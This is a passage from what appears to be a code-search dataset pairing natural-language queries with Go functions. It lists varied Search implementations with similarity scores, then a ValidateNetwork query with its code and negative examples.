Information:\")\n\tfmt.Printf(\"\\t:Track Name: %s\\n\", sTracks.Tracks.Items[0].TrackName)\n\tfmt.Printf(\"\\t:Track ID: %s\\n\", sTracks.Tracks.Items[0].TrackID)\n\tfmt.Printf(\"\\t:Is Explicit: %s\\n\", strconv.FormatBool(sTracks.Tracks.Items[0].Explicit))\n\tfmt.Printf(\"\\t:Artist Name: %s\\n\", sTracks.Tracks.Items[0].Artists[0].ArtistName)\n\tfmt.Printf(\"\\t:Artist ID: %s\\n\", sTracks.Tracks.Items[0].Artists[0].ArtistID)\n\n\tjson.NewEncoder(w).Encode(sTracks)\n}", "func (i ItunesUpstream) Search(search string) ([]*data.Item, error) {\n\tvar err error\n\tvar response *itunes.Response\n\n\treportDuration(\n\t\tfunc() {\n\t\t\tresponse, err = i.itunes.Search(search)\n\t\t},\n\t\ti.o,\n\t)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar items []*data.Item\n\n\tfor _, item := range response.Results {\n\t\titems = append(items, &data.Item{\n\t\t\tTitle: item.TrackName,\n\t\t\tType: \"music\",\n\t\t\tCreators: []string{item.ArtistName},\n\t\t})\n\t}\n\n\treturn items, nil\n}", "func (c MethodsCollection) Search() pSearch {\n\treturn pSearch{\n\t\tMethod: c.MustGet(\"Search\"),\n\t}\n}", "func (cp Pack) Search(tfs TagFilterSet) AccountSet {\n\tresults := AccountSet{}\n\tfor _, c := range cp {\n\t\tresults = append(results, c.Search(tfs)...)\n\t}\n\treturn results\n}", "func search() {\n\tfor {\n\t\tfmt.Print(\"Input book name:\")\n\t\tname := getInput()\n\t\tif name != \"\" {\n\t\t\tnovels := SearchNovel(name)\n\t\t\tfor index, novel := range novels {\n\t\t\t\tfmt.Println(index, \".\")\n\t\t\t\tnovel.Println()\n\t\t\t\tfmt.Println()\n\t\t\t}\n\t\t\tfmt.Println(\"Input book index to start read:\")\n\t\t\tindex := getInput()\n\t\t\tindexInt64, _ := strconv.ParseInt(index, 10, 0)\n\t\t\tindexInt := int(indexInt64)\n\t\t\tif indexInt >= 0 && indexInt < len(novels) {\n\t\t\t\tfmt.Println(\"Start reading book:\", novels[indexInt].Name)\n\t\t\t\tfmt.Println()\n\t\t\t\tread(novels[indexInt], 0)\n\t\t\t} else {\n\t\t\t\tfmt.Println(\"Invalid book index.\")\n\t\t\t\tfmt.Println()\n\t\t\t}\n\n\t\t}\n\t}\n}", "func (r ApiGetPlansRequest) Search(search string) ApiGetPlansRequest {\n\tr.search = &search\n\treturn r\n}", "func search(c *fb.Context, w http.ResponseWriter, r *http.Request) (int, error) {\n\t// Upgrades the connection to a websocket and checks for fb.Errors.\n\tconn, err := upgrader.Upgrade(w, r, nil)\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\tdefer conn.Close()\n\n\tvar (\n\t\tvalue string\n\t\tsearch *searchOptions\n\t\tmessage []byte\n\t)\n\n\t// Starts an infinite loop until a valid command is captured.\n\tfor {\n\t\t_, message, err = conn.ReadMessage()\n\t\tif err != nil {\n\t\t\treturn http.StatusInternalServerError, err\n\t\t}\n\n\t\tif len(message) != 0 {\n\t\t\tvalue = string(message)\n\t\t\tbreak\n\t\t}\n\t}\n\n\tsearch = parseSearch(value)\n\tscope := strings.TrimPrefix(r.URL.Path, \"/\")\n\tscope = \"/\" + scope\n\tscope = c.User.Scope + scope\n\tscope = strings.Replace(scope, \"\\\\\", \"/\", -1)\n\tscope = filepath.Clean(scope)\n\n\terr = filepath.Walk(scope, func(path string, f os.FileInfo, err error) error {\n\t\tif search.CaseInsensitive {\n\t\t\tpath = strings.ToLower(path)\n\t\t}\n\n\t\tpath = strings.TrimPrefix(path, scope)\n\t\tpath = strings.TrimPrefix(path, \"/\")\n\t\tpath = strings.Replace(path, \"\\\\\", \"/\", -1)\n\n\t\t// Only execute if there are conditions to meet.\n\t\tif len(search.Conditions) > 0 {\n\t\t\tmatch := false\n\n\t\t\tfor _, t := range search.Conditions {\n\t\t\t\tif t(path) {\n\t\t\t\t\tmatch = true\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// If doesn't meet the condition, go to the next.\n\t\t\tif !match {\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\n\t\tif len(search.Terms) > 0 {\n\t\t\tis := false\n\n\t\t\t// Checks if matches the terms and if it is allowed.\n\t\t\tfor _, term := range search.Terms {\n\t\t\t\tif is {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\tif strings.Contains(path, term) {\n\t\t\t\t\tif !c.User.Allowed(path) {\n\t\t\t\t\t\treturn nil\n\t\t\t\t\t}\n\n\t\t\t\t\tis = true\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif !is {\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\n\t\tresponse, _ := json.Marshal(map[string]interface{}{\n\t\t\t\"dir\": f.IsDir(),\n\t\t\t\"path\": path,\n\t\t})\n\n\t\treturn conn.WriteMessage(websocket.TextMessage, response)\n\t})\n\n\tif err != nil {\n\t\treturn http.StatusInternalServerError, err\n\t}\n\n\treturn 0, nil\n}", "func Search(c *gin.Context) {\n\tvar (\n\t\tp searchEnvironments\n\t)\n\tif err := c.ShouldBind(&p); err != nil {\n\t\tc.JSON(http.StatusBadRequest, gin.H{\"error\": err.Error()})\n\t\treturn\n\t}\n\tp.StartLimit, p.EndLimit = tools.GetPagination(p.Page, 0, commons.GetRangeLimit(), commons.GetRangeLimit())\n\n\tresult, err := p.search()\n\tif err != nil {\n\t\tlog.Error().Err(err).Msg(\"Error occured while performing db query\")\n\t\tc.JSON(http.StatusInternalServerError, gin.H{\"error\": \"Internal Server Error\"})\n\t\treturn\n\t}\n\n\tif len(result) == 0 {\n\t\tc.AbortWithStatus(204)\n\t} else {\n\t\tc.JSON(http.StatusOK, result)\n\t}\n}", "func (s Serial) Search(phenomes []neat.Phenome) ([]neat.Result, error) {\n\tresults := make([]neat.Result, len(phenomes))\n\tfor i, phenome := range phenomes {\n\t\tresults[i] = s.ctx.Evaluator().Evaluate(phenome)\n\t}\n\treturn results, nil\n}", "func (h *Hostman) Search(query string) Entries {\n\tvar matches Entries\n\n\tentries := h.Entries()\n\n\tfor _, entry := range entries {\n\t\tif strings.Contains(entry.Raw, query) {\n\t\t\tmatches = append(matches, entry)\n\t\t}\n\t}\n\n\treturn matches\n}", "func (a *Api) Search(q string, limit int) (*SearchResult, error) {\n\tif limit == 0 {\n\t\tlimit = 20\n\t}\n\tparams := *a.defaultParams()\n\tdelete(params, \"UserId\")\n\tdelete(params, \"DeviceId\")\n\tparams[\"SearchTerm\"] = q\n\tparams[\"Limit\"] = fmt.Sprint(limit)\n\tparams.setIncludeTypes(mediaTypeSong)\n\n\tbody, err := a.get(\"/Search/Hints\", &params)\n\tif err != nil {\n\t\tmsg := getBodyMsg(body)\n\t\treturn nil, fmt.Errorf(\"query failed: %v: %s\", err, msg)\n\t}\n\tresult := &SearchResult{}\n\terr = json.NewDecoder(body).Decode(result)\n\tif err != nil {\n\t\terr = fmt.Errorf(\"json parsing failed: %v\", err)\n\t}\n\n\tif len(result.Items) > 0 {\n\t\tfor i, _ := range result.Items {\n\t\t\tresult.Items[i].Duration /= 10000000\n\t\t}\n\t}\n\n\treturn result, err\n}", "func searchSongs(ctx context.Context, w http.ResponseWriter, r *http.Request) {\n criteria := pat.Param(ctx, \"searchCriteria\")\n result := searchSongsDA(criteria)\n fmt.Fprintf(w, result)\n}", "func (s *service) searchCore(w http.ResponseWriter, r *http.Request, _ httprouter.Params) {\n\tvar err error\n\n\tq := r.FormValue(\"q\")\n\tif len(q) == 0 {\n\t\tq = \"*\"\n\t}\n\n\tsort := r.FormValue(\"sort\")\n\tif len(sort) == 0 {\n\t\tsort = \"dumped_at\"\n\t}\n\tswitch sort {\n\tcase \"dumped_at\", \"hostname\":\n\t\tbreak\n\tdefault:\n\t\twriteError(w, http.StatusBadRequest, fmt.Errorf(\"invalid sort field '%s'\", sort))\n\t\treturn\n\t}\n\n\torder := r.FormValue(\"order\")\n\tif len(order) == 0 {\n\t\torder = \"desc\"\n\t}\n\tswitch order {\n\tcase \"asc\", \"desc\":\n\t\tbreak\n\tdefault:\n\t\twriteError(w, http.StatusBadRequest, fmt.Errorf(\"invalid sort order '%s'\", order))\n\t\treturn\n\t}\n\n\trawSize := r.FormValue(\"size\")\n\tif len(rawSize) == 0 {\n\t\trawSize = \"50\"\n\t}\n\tsize, err := strconv.Atoi(rawSize)\n\tif err != nil {\n\t\twriteError(w, http.StatusBadRequest, wrap(err, \"invalid size parameter\"))\n\t\treturn\n\t}\n\n\trawFrom := r.FormValue(\"from\")\n\tif len(rawFrom) == 0 {\n\t\trawFrom = \"0\"\n\t}\n\tfrom, err := strconv.Atoi(rawFrom)\n\tif err != nil {\n\t\twriteError(w, http.StatusBadRequest, wrap(err, \"invalid from parameter\"))\n\t\treturn\n\t}\n\n\tres, total, err := s.index.Search(q, sort, order, size, from)\n\tif err != nil {\n\t\twriteError(w, http.StatusBadRequest, err)\n\t\treturn\n\t}\n\n\twrite(w, http.StatusOK, SearchResult{Results: res, Total: total})\n}", "func (ds *DashboardsService) Search(ctx context.Context, opt *DashboardSearchOptions) ([]*DashboardHit, error) {\n\tu := \"/api/search\"\n\n\tu, err := addOptions(u, opt)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq, err := ds.client.NewRequest(ctx, \"GET\", u, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar hits []*DashboardHit\n\t_, err = ds.client.Do(req, &hits)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn hits, nil\n}", "func ShowSearch() {\n\tfmt.Printf(\"%v\\n\", searchText)\n}", "func (s *GrepEngine) Search(terms ...string) ([]*Result, error) {\n\texpr := \"\"\n\tif len(terms) > 0 {\n\t\texpr = terms[0]\n\t}\n\n\trx, err := compileRx(expr, !s.CaseSensitive)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tmatches := func(s string) []string {\n\t\treturn rx.FindAllString(s, -1)\n\t}\n\n\treturn searchInNotes(s.notes, matches, s.OnlyNames)\n}", "func Search(terms []string) Params {\n\treturn Params{make(url.Values), SearchURL}.Country(CN).Terms(terms)\n}", "func (i *ItemInventory) Search(alias string, num int) *Item {\n\tif i == nil {\n\t\treturn nil\n\t}\n\n\tpass := 1\n\tfor _, c := range i.Contents {\n\t\tif strings.Contains(c.Name, alias){\n\t\t\tif pass == num {\n\t\t\t\treturn c\n\t\t\t}else{\n\t\t\t\tpass++\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}", "func (l *lib) Search(params *Params) (*Result, *Response, error) {\n\tp := twitter.SearchTweetParams(*params)\n\n\tif search, response, err := l.client.Search.Tweets(&p); err != nil {\n\t\treturn nil, nil, errors.Wrap(err, \"failed to search twitter\")\n\t} else {\n\t\treturn search, new(Response).FromHttpResponse(response), nil\n\t}\n}", "func (c *moovWatchmanClient) Search(ctx context.Context, name string, requestID string) (*watchman.OfacSdn, error) {\n\tindividualSearch, err := c.ofacSearch(ctx, name, \"individual\", requestID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tentitySearch, err := c.ofacSearch(ctx, name, \"entity\", requestID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tsearch := highestOfacSearchMatch(individualSearch, entitySearch)\n\n\tif search == nil || (len(search.SDNs) == 0 && len(search.AltNames) == 0) {\n\t\treturn nil, nil // Nothing found\n\t}\n\n\t// We prefer to return the SDN, but if there's an AltName with a higher match return that instead.\n\tif len(search.SDNs) > 0 && len(search.AltNames) == 0 {\n\t\treturn &search.SDNs[0], nil // return SDN as it was all we got\n\t}\n\t// Take an Alt and find the SDN for it if that was the highest match\n\tif len(search.SDNs) == 0 && len(search.AltNames) > 0 {\n\t\talt := search.AltNames[0]\n\t\tc.logger.Log(fmt.Sprintf(\"Found AltName=%s,SDN=%s with no higher matched SDNs\", alt.AlternateID, alt.EntityID))\n\t\treturn c.altToSDN(ctx, search.AltNames[0], requestID)\n\t}\n\t// AltName matched higher than SDN names, so return the SDN of the matched AltName\n\tif len(search.SDNs) > 0 && len(search.AltNames) > 0 && (search.AltNames[0].Match > 0.1) && search.AltNames[0].Match > search.SDNs[0].Match {\n\t\talt := search.AltNames[0]\n\t\tc.logger.Log(fmt.Sprintf(\"AltName=%s,SDN=%s had higher match than SDN=%s\", alt.AlternateID, alt.EntityID, search.SDNs[0].EntityID))\n\t\treturn c.altToSDN(ctx, alt, requestID)\n\t}\n\t// Return the SDN as Alts matched lower\n\tif len(search.SDNs) > 0 {\n\t\treturn &search.SDNs[0], nil\n\t}\n\n\treturn nil, nil // Nothing found\n}", "func (s searcher) Search(ctx context.Context, query SearchQuery) (\n\tresp *SearchResult, err error) {\n\n\tsw := stopwatch.New()\n\tsw.Start(\"total\")\n\n\tvar (\n\t\trepo *Repo\n\t\tshards []string\n\t\tirepo interface{}\n\t\twaitingFor int\n\t\tch chan *SearchResult\n\t)\n\tresp = NewSearchResult()\n\n\t// If the repo is not found or is not available to search,\n\t// exit with a RepoUnavailable error. Ignore repo being\n\t// indexed currently.\n\trepokey := query.firstKey()\n\tlog.Info(\"search [%s] [path %s] local repo=%v\", query.Re, query.PathRe, repokey)\n\n\tif repokey == \"\" {\n\t\tresp.Error = kRepoKeyEmptyError.Error()\n\t\tlog.Debug(\"search backend error %v\", resp.Error)\n\t\tgoto done\n\t}\n\tirepo = s.repos.Get(repokey)\n\tif irepo == nil {\n\t\tresp.Errors[repokey] = kRepoUnavailableError\n\t\tgoto done\n\t}\n\trepo = irepo.(*Repo)\n\tresp.Repos[repokey] = repo\n\n\tif repo.State == INDEXING {\n\t\t// The repo is (con)currently indexing\n\t\tgoto done\n\t} else if repo.State != OK {\n\t\t// The repo is currently in error, exit early\n\t\t// and potentially delete the offending repo.\n\t\tresp.Errors[repokey] = kRepoUnavailableError\n\t\tif s.cfg.DeleteRepoOnError {\n\t\t\t_ = s.repos.Delete(repokey)\n\t\t}\n\t\tgoto done\n\t}\n\n\tshards = repo.Shards()\n\twaitingFor = len(shards)\n\tch = make(chan *SearchResult, waitingFor+1)\n\tdefer close(ch)\n\n\tfor _, shard := range shards {\n\t\tgo func(r *Repo, fname string) {\n\t\t\tsr, e := searchLocal(ctx, query, r, fname)\n\t\t\tsr.Repos[r.Key] = r\n\t\t\tif e != nil {\n\t\t\t\t// Report the error, possibly marking the repo as unavailable\n\t\t\t\t// and if so, potentially deleting it if configured to do so.\n\t\t\t\tif os.IsNotExist(e) || os.IsPermission(e) {\n\t\t\t\t\tlog.Warning(\"repo [%s] not available error: %v\", r.Key, e)\n\t\t\t\t\tr.State = ERROR\n\t\t\t\t\tsr.Errors[r.Key] = errs.NewStructError(\n\t\t\t\t\t\terrs.NewRepoUnavailableError())\n\n\t\t\t\t\tif s.cfg.DeleteRepoOnError {\n\t\t\t\t\t\t_ = s.repos.Delete(r.Key)\n\t\t\t\t\t} else {\n\t\t\t\t\t\t_ = s.repos.Set(r.Key, r)\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\tsr.Errors[r.Key] = errs.NewStructError(e)\n\t\t\t\t}\n\t\t\t}\n\t\t\tselect {\n\t\t\tcase <-ctx.Done():\n\t\t\t\t// Report the timeout\n\t\t\t\tresp.Errors[repokey] = kSearchTimeoutError\n\t\t\tdefault:\n\t\t\t\tch <- sr\n\t\t\t}\n\n\t\t}(repo, shard)\n\t}\n\n\t// Await goroutine completion either in error or otherwise\n\tfor waitingFor > 0 {\n\t\tselect {\n\t\tcase <-ctx.Done():\n\t\t\tbreak\n\t\tcase in := <-ch:\n\t\t\tlog.Debug(\"got one %q\", in)\n\t\t\tresp.Update(in)\n\t\t\twaitingFor--\n\t\t}\n\t}\ndone:\n\tresp.Durations.Search = sw.Stop(\"total\")\n\tlog.Info(\"search [%s] [path %s] local done %d matches errors=%v (%v)\",\n\t\tquery.Re, query.PathRe, resp.NumMatches, resp.Errors, resp.Durations.Search)\n\treturn\n}", "func searchAll(searchItem string) {\n\tstrippedItem := common.ConvertSpacesToNbsp(searchItem)\n\tfmt.Println(\"my strippedItem, \", strippedItem)\n\n}", "func (s *Server) TradeSearch(ctx context.Context, req *pb.TradeSearchRequest) (*pb.TradeSearchResponse, error) {\n\tif req == nil {\n\t\treturn nil, fmt.Errorf(\"request nil\")\n\t}\n\tresp := new(pb.TradeSearchResponse)\n\tif req.Limit < 1 {\n\t\treq.Limit = 10\n\t}\n\tif req.Limit > 100 {\n\t\treq.Limit = 100\n\t}\n\tif req.Offset < 0 {\n\t\treq.Offset = 0\n\t}\n\n\treq.Orderby = strings.ToLower(req.Orderby)\n\tif req.Orderby == \"\" {\n\t\treq.Orderby = \"name\"\n\t}\n\torderByFields := []string{\"name\"}\n\n\tquery := \"SELECT count(id) as total, trade_types.* FROM trade_types WHERE \"\n\n\targs := map[string]interface{}{}\n\tif len(req.Name) > 0 {\n\t\tquery += \"name LIKE :name\"\n\t\targs[\"name\"] = fmt.Sprintf(\"%%%s%%\", req.Name)\n\t}\n\n\tisValid := false\n\tfor _, field := range orderByFields {\n\t\tif req.Orderby != field {\n\t\t\tcontinue\n\t\t}\n\t\tisValid = true\n\t}\n\tif !isValid {\n\t\treturn nil, fmt.Errorf(\"invalid orderby. Valid options are: %s\", strings.Join(orderByFields, \",\"))\n\t}\n\n\targs[\"orderby\"] = req.Orderby\n\tquery += \" ORDER BY :orderby\"\n\tif req.Orderdesc {\n\t\tquery += \" DESC\"\n\t} else {\n\t\tquery += \" ASC\"\n\t}\n\n\targs[\"limit\"] = req.Limit\n\targs[\"offset\"] = req.Offset\n\tquery += \" LIMIT :limit OFFSET :offset\"\n\n\tlog.Debug().Interface(\"args\", args).Msgf(\"query: %s\", query)\n\trows, err := s.db.NamedQueryContext(ctx, query, args)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"query failed\")\n\t}\n\n\tfor rows.Next() {\n\t\ttrade := new(Trade)\n\t\terr = rows.StructScan(trade)\n\t\tif err != nil {\n\t\t\treturn nil, errors.Wrap(err, \"structscan\")\n\t\t}\n\t\tresp.Trades = append(resp.Trades, trade.ToProto())\n\t\tresp.Total = trade.Total\n\t}\n\n\treturn resp, nil\n}", "func (p *NoteStoreClient) GetSearch(ctx context.Context, authenticationToken string, guid GUID) (r *SavedSearch, err error) {\n var _args87 NoteStoreGetSearchArgs\n _args87.AuthenticationToken = authenticationToken\n _args87.GUID = guid\n var _result88 NoteStoreGetSearchResult\n if err = p.Client_().Call(ctx, \"getSearch\", &_args87, &_result88); err != nil {\n return\n }\n switch {\n case _result88.UserException!= nil:\n return r, _result88.UserException\n case _result88.SystemException!= nil:\n return r, _result88.SystemException\n case _result88.NotFoundException!= nil:\n return r, _result88.NotFoundException\n }\n\n return _result88.GetSuccess(), nil\n}", "func Search(query string, cache *leveldb.DB) chan MovieMeta {\n\tmetach := make(chan MovieMeta)\n\tvar wgs [](*sync.WaitGroup)\n\twgs = append(wgs, aveSearch(query, metach))\n\twgs = append(wgs, caribSearch(query, metach))\n\twgs = append(wgs, caribprSearch(query, metach))\n\twgs = append(wgs, dmmSearch(query, metach))\n\twgs = append(wgs, heyzoSearch(query, metach))\n\twgs = append(wgs, javSearch(query, metach))\n\twgs = append(wgs, mgsSearch(query, metach))\n\twgs = append(wgs, tkhSearch(query, metach))\n\tif cache != nil {\n\t\twgs = append(wgs, opdSearch(cache)(query, metach))\n\t}\n\n\tgo func() {\n\t\tfor _, wg := range wgs {\n\t\t\twg.Wait()\n\t\t}\n\t\tclose(metach)\n\t}()\n\treturn postprocess(metach)\n}", "func SearchPkg(key string) []*hv.PkgInfo {\n\tq := connDb()\n\tdefer q.Close()\n\n\tvar pinfos []*hv.PkgInfo\n\tcond := qbs.NewCondition(\"import_path like ?\", \"%\"+key+\"%\").Or(\"synopsis like ?\", \"%\"+key+\"%\")\n\tq.Limit(200).Condition(cond).OrderByDesc(\"rank\").FindAll(&pinfos)\n\treturn pinfos\n}", "func (t *GiST) search(ctx context.Context,q interface{},node int64, ch chan <- Pair) error {\n\tif node<=16 { return ErrInternal }\n\terr := ctx.Err()\n\tif err!=nil { return err }\n\tb,err := t.Read(node)\n\tdefer b.Free()\n\tif err!=nil { return err }\n\tnobj := &Node{KT:t.Ops.KT}\n\terr = msgpack.Unmarshal(b.Ptr,nobj)\n\tif err!=nil { return err }\n\tfor _,e := range nobj.Elems {\n\t\tif !t.Ops.Consistent(e.P,q) { continue }\n\t\tif len(e.Data)>0 {\n\t\t\tselect {\n\t\t\tcase ch <- Pair{e.P,WrapBuffer(e.Data)}:\n\t\t\tcase <- ctx.Done() : return ctx.Err()\n\t\t\t}\n\t\t} else if e.Ptr>=16 {\n\t\t\terr = t.search(ctx,q,e.Ptr,ch)\n\t\t\tif err!=nil { return err }\n\t\t}\n\t}\n\treturn nil\n}" ]
[ "0.6486218", "0.6482556", "0.6436115", "0.63494456", "0.63310945", "0.6226671", "0.62113196", "0.62071586", "0.6191202", "0.6155028", "0.61464447", "0.6116039", "0.60901916", "0.60784996", "0.6064667", "0.6061123", "0.6048405", "0.60473895", "0.60432905", "0.6012252", "0.6011571", "0.6011571", "0.60084206", "0.600489", "0.5983241", "0.5937555", "0.5928684", "0.59131265", "0.59003544", "0.5897314", "0.58906996", "0.58817816", "0.5860359", "0.5851884", "0.5841445", "0.58056176", "0.57908875", "0.57877934", "0.5775768", "0.5770331", "0.5768201", "0.57461625", "0.5735643", "0.5725812", "0.57051337", "0.5704799", "0.5682584", "0.56761867", "0.56715465", "0.5669446", "0.566536", "0.56552875", "0.56530297", "0.56403923", "0.56332624", "0.56099147", "0.5600974", "0.5600297", "0.5595958", "0.5579832", "0.5572367", "0.55687195", "0.55675906", "0.55564564", "0.5551283", "0.55488193", "0.55488193", "0.5547307", "0.5544881", "0.55402434", "0.55377865", "0.5535414", "0.5534749", "0.55234396", "0.55220544", "0.55146575", "0.55058974", "0.5489176", "0.5480545", "0.5478343", "0.54753274", "0.54750097", "0.54729503", "0.546867", "0.54500043", "0.5446308", "0.54461545", "0.544298", "0.5441452", "0.54406726", "0.54334426", "0.5423741", "0.54220885", "0.54184836", "0.5382848", "0.5378657", "0.5372362", "0.536937", "0.5364483", "0.5363302" ]
0.75943005
0
ValidateNetwork validates a Network object.
func ValidateNetwork(network *extensionsv1alpha1.Network) field.ErrorList { allErrs := field.ErrorList{} allErrs = append(allErrs, apivalidation.ValidateObjectMeta(&network.ObjectMeta, true, apivalidation.NameIsDNSSubdomain, field.NewPath("metadata"))...) allErrs = append(allErrs, ValidateNetworkSpec(&network.Spec, field.NewPath("spec"))...) return allErrs }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (m *Network) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateID(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateMasterInterface(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateType(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *PVMInstanceNetwork) Validate(formats strfmt.Registry) error {\n\treturn nil\n}", "func validateNetwork(t *testing.T, workingDir string) {\n\tterraformOptions := test_structure.LoadTerraformOptions(t, workingDir)\n\n\tsubnetNames := terraformOptions.Vars[\"subnet_names\"].([]interface{})\n\n\toutput := terraform.Output(t, terraformOptions, \"network_id\")\n\tassert.NotEmpty(t, output, \"network_id is empty\")\n\n\tsubnets := terraform.OutputList(t, terraformOptions, \"subnet_ids\")\n\tassert.Len(t, subnets, len(subnetNames), \"`subnet_ids` length is invalid\")\n\n\taddresses := terraform.OutputList(t, terraformOptions, \"subnet_address_ranges\")\n\tassert.Len(t, addresses, len(subnetNames), \"`subnet_address_ranges` length is invalid\")\n\n\t// check addresses\n\tfor _, cidr := range addresses {\n\t\t_, _, err := net.ParseCIDR(cidr)\n\t\tassert.Nil(t, err, \"net.ParseCIDR\")\n\t}\n}", "func (n *Network) Validate() field.ErrorList {\n\tvar validateErrors field.ErrorList\n\n\t// validate network config (id, genesis, consensus and join)\n\tvalidateErrors = append(validateErrors, n.Spec.NetworkConfig.Validate()...)\n\n\t// validate nodes\n\tvalidateErrors = append(validateErrors, n.ValidateNodes()...)\n\n\treturn validateErrors\n}", "func (o *IpamNetworkDataData) SetNetworkIsValid(v string) {\n\to.NetworkIsValid = &v\n}", "func ValidateNetworkUpdate(new, old *extensionsv1alpha1.Network) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tallErrs = append(allErrs, apivalidation.ValidateObjectMetaUpdate(&new.ObjectMeta, &old.ObjectMeta, field.NewPath(\"metadata\"))...)\n\tallErrs = append(allErrs, ValidateNetworkSpecUpdate(&new.Spec, &old.Spec, new.DeletionTimestamp != nil, field.NewPath(\"spec\"))...)\n\tallErrs = append(allErrs, ValidateNetwork(new)...)\n\n\treturn allErrs\n}", "func validNetwork(i string) bool {\n\t_, _, err := net.ParseCIDR(i)\n\tif err == nil {\n\t\treturn true\n\t}\n\tif net.ParseIP(i) != nil {\n\t\treturn true\n\t}\n\treturn false\n}", "func validateNetworkInputs(p netintents.Network) error {\n\t// validate name\n\terrs := validation.IsValidName(p.Metadata.Name)\n\tif len(errs) > 0 {\n\t\treturn pkgerrors.Errorf(\"Invalid network name - name=[%v], errors: %v\", p.Metadata.Name, errs)\n\t}\n\n\t// validate cni type\n\tfound := false\n\tfor _, val := range nettypes.CNI_TYPES {\n\t\tif p.Spec.CniType == val {\n\t\t\tfound = true\n\t\t\tbreak\n\t\t}\n\t}\n\tif !found {\n\t\treturn pkgerrors.Errorf(\"Invalid cni type: %v\", p.Spec.CniType)\n\t}\n\n\tsubnets := p.Spec.Ipv4Subnets\n\tfor _, subnet := range subnets {\n\t\terr := nettypes.ValidateSubnet(subnet)\n\t\tif err != nil {\n\t\t\treturn pkgerrors.Wrap(err, \"invalid subnet\")\n\t\t}\n\t}\n\treturn nil\n}", "func ValidateNetworkMode(c *Config) error {\n\tif c.General.Mode == \"\" {\n\t\tc.General.Mode = DefaultNetMode\n\t}\n\tc.General.Mode = strings.ToLower(c.General.Mode)\n\tswitch c.General.Mode {\n\tcase DualStackNetMode:\n\t\tfallthrough\n\tcase IPv4NetMode:\n\t\tfallthrough\n\tcase IPv6NetMode:\n\t\tglog.Infof(\"Building cluster in mode %q\", c.General.Mode)\n\tdefault:\n\t\treturn fmt.Errorf(\"unsupported network mode %q entered\", c.General.Mode)\n\t}\n\treturn nil\n}", "func validateExternalNetwork(ctx context.Context, cli client.Client, externalNetwork string) error {\n\tinstance := &crdv1.ExternalNetwork{}\n\tkey := types.NamespacedName{Name: externalNetwork}\n\terr := cli.Get(ctx, key, instance)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (nt NetworkType) Validate() error {\n\tswitch nt {\n\tcase NetworkTypeDefault, NetworkTypeHost, NetworkTypeWeave:\n\t\treturn nil\n\tdefault:\n\t\treturn maskAny(errgo.WithCausef(nil, ValidationError, \"unknown network type '%s'\", string(nt)))\n\t}\n}", "func (n NetworkConfig) validate() error {\n\tif n.IsEmpty() {\n\t\treturn nil\n\t}\n\tif err := n.VPC.validate(); err != nil {\n\t\treturn fmt.Errorf(`validate \"vpc\": %w`, err)\n\t}\n\tif err := n.Connect.validate(); err != nil {\n\t\treturn fmt.Errorf(`validate \"connect\": %w`, err)\n\t}\n\treturn nil\n}", "func (m *RecoveryPlanNetworkInfo) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateNetworkMapping(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateStaticIPAssignment(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *NetworkResource) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateIPAM(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateIndexConfigs(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *NetworkElement) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\t// validation for a type composition with EquipmentBase\n\tif err := m.EquipmentBase.Validate(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateCards(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateFanmodules(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateManagementContoller(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateManagementEntity(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validatePsus(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateRegisteredDevice(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateTopSystem(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateUcsmRunningFirmware(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func checkCreateNetwork(t *testing.T, expError bool, tenant, network, encap, subnet, gw string, tag int) {\n\tnet := client.Network{\n\t\tTenantName: tenant,\n\t\tNetworkName: network,\n\t\tEncap: 